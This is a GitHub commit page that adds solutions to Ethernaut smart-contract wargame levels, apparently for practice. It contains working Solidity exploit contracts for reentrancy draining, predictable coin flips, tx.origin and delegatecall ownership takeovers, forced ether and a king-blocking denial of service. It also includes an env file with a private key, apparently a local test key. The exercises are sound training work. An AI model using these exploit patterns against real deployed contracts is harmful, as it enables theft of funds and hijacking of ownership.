generated from foundry-rs/foundry-rust-template
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
fix king attack complete gatekeeper two pass lvl15 fix solidity vs code settings solve ethernaut lvl 16 solve ethernaut lvl17 solve ethernaut lvl 18
- Loading branch information
Showing
60 changed files
with
5,894 additions
and
7 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,3 +1,4 @@ | ||
FOUNDRY_VERBOSITY=3 | ||
FOUNDRY_TX_ORIGIN=0xa0Ee7A142d267C1f36714E4a8F75612F20a79720 | ||
FOUNDRY_SENDER=0xa0Ee7A142d267C1f36714E4a8F75612F20a79720 | ||
PRIVATE_KEY=0x2a871d0798f97d79848a013d4936a73bf4cc922c825d33c1cf7073dff6d409c6 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,33 @@ | ||
// SPDX-License-Identifier: MIT | ||
pragma solidity ^0.8.0; | ||
|
||
interface CoinFlip { | ||
function flip(bool _guess) external returns (bool); | ||
} | ||
|
||
contract CoinFlipExploit { | ||
uint256 public consecutiveWins; | ||
uint256 lastHash; | ||
uint256 FACTOR = 57896044618658097711785492504343953926634992332820282019728792003956564819968; | ||
CoinFlip target; | ||
|
||
constructor(address _coinFlip) { | ||
target = CoinFlip(_coinFlip); | ||
} | ||
|
||
function flip() public { | ||
uint256 blockValue = uint256(blockhash(block.number - 1)); | ||
|
||
if (lastHash == blockValue) { | ||
revert(); | ||
} | ||
|
||
lastHash = blockValue; | ||
uint256 coinFlip = blockValue / FACTOR; | ||
bool side = coinFlip == 1 ? true : false; | ||
|
||
bool result = target.flip(side); | ||
|
||
require(result); | ||
} | ||
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,42 @@ | ||
// SPDX-License-Identifier: MIT | ||
pragma solidity ^0.6.12; | ||
|
||
interface Reentrance { | ||
function balances(address) external view returns (uint256); | ||
function donate(address _to) external payable; | ||
function balanceOf(address _who) external view returns (uint256 balance); | ||
function withdraw(uint256 _amount) external; | ||
} | ||
|
||
contract Donatexploit { | ||
address payable public owner; | ||
address public target; | ||
|
||
bool private _reenter = true; | ||
uint256 private _amount; | ||
|
||
constructor(address _target) public { | ||
owner = payable(msg.sender); | ||
target = _target; | ||
} | ||
|
||
modifier onlyOwner() { | ||
require(msg.sender == owner); | ||
_; | ||
} | ||
|
||
function attack() public payable onlyOwner { | ||
Reentrance reentr = Reentrance(payable(target)); | ||
reentr.donate{value: msg.value}(address(this)); | ||
_amount = reentr.balanceOf(address(this)); | ||
reentr.withdraw(_amount); | ||
} | ||
|
||
function withdraw() public onlyOwner { | ||
owner.transfer(address(this).balance); | ||
} | ||
|
||
receive() external payable { | ||
(bool _,) = target.call(abi.encodeWithSignature("withdraw(uint256)", _amount)); | ||
} | ||
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,27 @@ | ||
// SPDX-License-Identifier: MIT | ||
pragma solidity ^0.8.0; | ||
|
||
interface Building { | ||
function isLastFloor(uint256) external returns (bool); | ||
} | ||
|
||
interface Elevator { | ||
function top() external returns (bool); | ||
function floor() external returns (uint256); | ||
function goTo(uint256 _floor) external; | ||
} | ||
|
||
contract ElevatorExploit is Building { | ||
bool private _last = true; | ||
|
||
function attack(address _target) public { | ||
Elevator _elevator = Elevator(payable(_target)); | ||
_elevator.goTo(0); | ||
require(_elevator.top(), "Didn't get to the top"); | ||
} | ||
|
||
function isLastFloor(uint256) external returns (bool) { | ||
_last = !_last; | ||
return _last; | ||
} | ||
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,16 @@ | ||
// SPDX-License-Identifier: MIT | ||
pragma solidity ^0.8.0; | ||
|
||
contract ForceExploit { | ||
address private owner; | ||
|
||
constructor() payable { | ||
require(msg.value > 0); | ||
owner = msg.sender; | ||
} | ||
|
||
function hack(address _target) public { | ||
require(msg.sender == owner && address(this).balance > 0); | ||
selfdestruct(payable(_target)); | ||
} | ||
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,14 @@ | ||
// SPDX-License-Identifier: MIT | ||
pragma solidity ^0.8.0; | ||
|
||
interface GatekeeperOne { | ||
function entrant() external view returns (address); | ||
function enter(bytes8 _gateKey) external returns (bool); | ||
} | ||
|
||
contract Gatexploit { | ||
function attack(address _target) public { | ||
GatekeeperOne gatekeeper = GatekeeperOne(payable(_target)); | ||
gatekeeper.enter{gas: (3 * 8191) + 268}(0x0000972000009720); | ||
} | ||
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,13 @@ | ||
// SPDX-License-Identifier: MIT | ||
pragma solidity ^0.8.0; | ||
|
||
interface GatekeeperTwo { | ||
function enter(bytes8 _gateKey) external returns (bool); | ||
} | ||
|
||
contract GatexploitTwo { | ||
constructor(address _target) { | ||
bytes8 _gateKey = bytes8(type(uint64).max ^ uint64(bytes8(keccak256(abi.encodePacked(address(this)))))); | ||
_target.call(abi.encodeWithSignature("enter(bytes8)", _gateKey)); | ||
} | ||
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,33 @@ | ||
// SPDX-License-Identifier: MIT | ||
pragma solidity ^0.8.0; | ||
|
||
interface King { | ||
function prize() external view returns (uint256); | ||
function owner() external view returns (address); | ||
function _king() external view returns (address); | ||
} | ||
|
||
contract KingExploit { | ||
address payable owner; | ||
King king; | ||
|
||
constructor(address _king) payable { | ||
owner = payable(msg.sender); | ||
king = King(payable(_king)); | ||
} | ||
|
||
modifier onlyOwner() { | ||
require(msg.sender == owner); | ||
_; | ||
} | ||
|
||
function becomeKing() public onlyOwner { | ||
uint256 prize = king.prize(); | ||
(bool success,) = address(king).call{value: prize}(""); | ||
require(success, "becomeKing() failed because call failed"); | ||
} | ||
|
||
receive() external payable { | ||
owner.transfer(address(this).balance + 1); | ||
} | ||
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,17 @@ | ||
// SPDX-License-Identifier: MIT | ||
pragma solidity ^0.8.0; | ||
|
||
contract MagicNumExploit { | ||
function whatIsTheMeaningOfLife() public pure { | ||
// PUSH32 0x2a | ||
// PUSH1 0 | ||
// MSTORE | ||
// PUSH1 1 | ||
// PUSH1 0x1f | ||
// RETURN | ||
assembly { | ||
mstore(0x00, 0x2A) | ||
return(0x00, 0x1F) | ||
} | ||
} | ||
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,20 @@ | ||
// SPDX-License-Identifier: MIT | ||
pragma solidity ^0.8.0; | ||
|
||
interface IPreservation { | ||
function setFirstTime(uint256 _timeStamp) external; | ||
function setSecondTime(uint256 _timeStamp) external; | ||
} | ||
|
||
contract PreservationExploit { | ||
constructor(address payable target_) { | ||
IPreservation target = IPreservation(target_); | ||
target.setSecondTime(uint256(uint160(address(this)))); | ||
} | ||
|
||
fallback() external { | ||
assembly { | ||
sstore(2, 0x000000000000000000000000a0Ee7A142d267C1f36714E4a8F75612F20a79720) | ||
} | ||
} | ||
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,16 @@ | ||
// SPDX-License-Identifier: MIT | ||
pragma solidity ^0.8.0; | ||
|
||
interface Telephone { | ||
function owner() external view returns (address); | ||
function changeOwner(address _owner) external; | ||
} | ||
|
||
contract TelephoneExploit { | ||
constructor(address _telephone) { | ||
Telephone telephone = Telephone(_telephone); | ||
address offender = address(0xa0Ee7A142d267C1f36714E4a8F75612F20a79720); | ||
telephone.changeOwner(offender); | ||
require(telephone.owner() == offender); | ||
} | ||
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,139 @@ | ||
pub use building::*; | ||
/// This module was auto-generated with ethers-rs Abigen. | ||
/// More information at: <https://github.com/gakonst/ethers-rs> | ||
#[allow( | ||
clippy::enum_variant_names, | ||
clippy::too_many_arguments, | ||
clippy::upper_case_acronyms, | ||
clippy::type_complexity, | ||
dead_code, | ||
non_camel_case_types | ||
)] | ||
pub mod building { | ||
#[allow(deprecated)] | ||
fn __abi() -> ::ethers::core::abi::Abi { | ||
::ethers::core::abi::ethabi::Contract { | ||
constructor: ::core::option::Option::None, | ||
functions: ::core::convert::From::from([( | ||
::std::borrow::ToOwned::to_owned("isLastFloor"), | ||
::std::vec![::ethers::core::abi::ethabi::Function { | ||
name: ::std::borrow::ToOwned::to_owned("isLastFloor"), | ||
inputs: ::std::vec![::ethers::core::abi::ethabi::Param { | ||
name: ::std::string::String::new(), | ||
kind: ::ethers::core::abi::ethabi::ParamType::Uint( | ||
256usize, | ||
), | ||
internal_type: ::core::option::Option::Some( | ||
::std::borrow::ToOwned::to_owned("uint256"), | ||
), | ||
},], | ||
outputs: ::std::vec![::ethers::core::abi::ethabi::Param { | ||
name: ::std::string::String::new(), | ||
kind: ::ethers::core::abi::ethabi::ParamType::Bool, | ||
internal_type: ::core::option::Option::Some( | ||
::std::borrow::ToOwned::to_owned("bool"), | ||
), | ||
},], | ||
constant: ::core::option::Option::None, | ||
state_mutability: | ||
::ethers::core::abi::ethabi::StateMutability::NonPayable, | ||
},], | ||
)]), | ||
events: ::std::collections::BTreeMap::new(), | ||
errors: ::std::collections::BTreeMap::new(), | ||
receive: false, | ||
fallback: false, | ||
} | ||
} | ||
///The parsed JSON ABI of the contract. | ||
pub static BUILDING_ABI: ::ethers::contract::Lazy< | ||
::ethers::core::abi::Abi, | ||
> = ::ethers::contract::Lazy::new(__abi); | ||
pub struct Building<M>(::ethers::contract::Contract<M>); | ||
impl<M> ::core::clone::Clone for Building<M> { | ||
fn clone(&self) -> Self { Self(::core::clone::Clone::clone(&self.0)) } | ||
} | ||
impl<M> ::core::ops::Deref for Building<M> { | ||
type Target = ::ethers::contract::Contract<M>; | ||
fn deref(&self) -> &Self::Target { &self.0 } | ||
} | ||
impl<M> ::core::ops::DerefMut for Building<M> { | ||
fn deref_mut(&mut self) -> &mut Self::Target { &mut self.0 } | ||
} | ||
impl<M> ::core::fmt::Debug for Building<M> { | ||
fn fmt( | ||
&self, | ||
f: &mut ::core::fmt::Formatter<'_>, | ||
) -> ::core::fmt::Result { | ||
f.debug_tuple(::core::stringify!(Building)) | ||
.field(&self.address()) | ||
.finish() | ||
} | ||
} | ||
impl<M: ::ethers::providers::Middleware> Building<M> { | ||
/// Creates a new contract instance with the | ||
/// specified `ethers` client at `address`. | ||
/// The contract derefs to a `ethers::Contract` | ||
/// object. | ||
pub fn new<T: Into<::ethers::core::types::Address>>( | ||
address: T, | ||
client: ::std::sync::Arc<M>, | ||
) -> Self { | ||
Self(::ethers::contract::Contract::new( | ||
address.into(), | ||
BUILDING_ABI.clone(), | ||
client, | ||
)) | ||
} | ||
///Calls the contract's `isLastFloor` (0x5f9a4bca) | ||
/// function | ||
pub fn is_last_floor( | ||
&self, | ||
p0: ::ethers::core::types::U256, | ||
) -> ::ethers::contract::builders::ContractCall<M, bool> { | ||
self.0 | ||
.method_hash([95, 154, 75, 202], p0) | ||
.expect("method not found (this should never happen)") | ||
} | ||
} | ||
impl<M: ::ethers::providers::Middleware> | ||
From<::ethers::contract::Contract<M>> for Building<M> | ||
{ | ||
fn from(contract: ::ethers::contract::Contract<M>) -> Self { | ||
Self::new(contract.address(), contract.client()) | ||
} | ||
} | ||
///Container type for all input parameters for the | ||
/// `isLastFloor` function with signature | ||
/// `isLastFloor(uint256)` and selector `0x5f9a4bca` | ||
#[derive( | ||
Clone, | ||
::ethers::contract::EthCall, | ||
::ethers::contract::EthDisplay, | ||
serde::Serialize, | ||
serde::Deserialize, | ||
Default, | ||
Debug, | ||
PartialEq, | ||
Eq, | ||
Hash, | ||
)] | ||
#[ethcall(name = "isLastFloor", abi = "isLastFloor(uint256)")] | ||
pub struct IsLastFloorCall(pub ::ethers::core::types::U256); | ||
///Container type for all return fields from the | ||
/// `isLastFloor` function with signature | ||
/// `isLastFloor(uint256)` and selector `0x5f9a4bca` | ||
#[derive( | ||
Clone, | ||
::ethers::contract::EthAbiType, | ||
::ethers::contract::EthAbiCodec, | ||
serde::Serialize, | ||
serde::Deserialize, | ||
Default, | ||
Debug, | ||
PartialEq, | ||
Eq, | ||
Hash, | ||
)] | ||
pub struct IsLastFloorReturn(pub bool); | ||
} |
Oops, something went wrong.